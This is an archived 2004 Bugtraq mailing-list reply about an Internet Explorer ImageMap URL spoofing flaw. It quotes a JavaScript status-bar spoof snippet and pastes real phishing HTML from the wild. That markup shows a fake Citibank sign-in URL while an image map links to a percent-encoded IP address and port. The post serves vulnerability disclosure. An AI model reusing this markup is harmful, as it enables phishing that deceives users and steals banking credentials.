lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 3 Jun 2004 09:54:09 -0400 From: "James C Slora Jr" <Jim.Slora@...a.com> To: <bugtraq@...urityfocus.com> Subject: RE: Microsoft Internet Explorer ImageMap URL Spoof Vulnerability > <a onmouseover="window.status='http://www.the-url-you- > see.com;return true" > title="The Link" > onmouseout="window.status='Whatever-you-like-here';return true" > href='http://www.some-other-url.com'>The link</a> > > > --> > > the point of the exercise is that default settings for the > most popular MUA's out there today have scripting disabled. True. This works better. From the wild. A HREF="https://web.da-us.citibank.com/signin/scripts/Iogin2/user_setup.jsp">< map name="FPMap0"><area coords="0, 0, 610, 275" shape="rect" href="http://%32%31%37%2E%33%37%2E%32%31%31%2E%32%35%30:%34%39%30%33/%63%69% 74/%69%6E%64%65%78%2E%68%74%6D"></map><img SRC="cid:part1.07010704.01060800@...r-billing47@...ibank.com" border="0" usemap="#FPMap0"</A> The cid reference points to an embedded GIF that looks like hyperlinked text https://web.da-us.citibank.com/signin/scripts/Iogin2/user_setup.jsp
Powered by blists - more mailing lists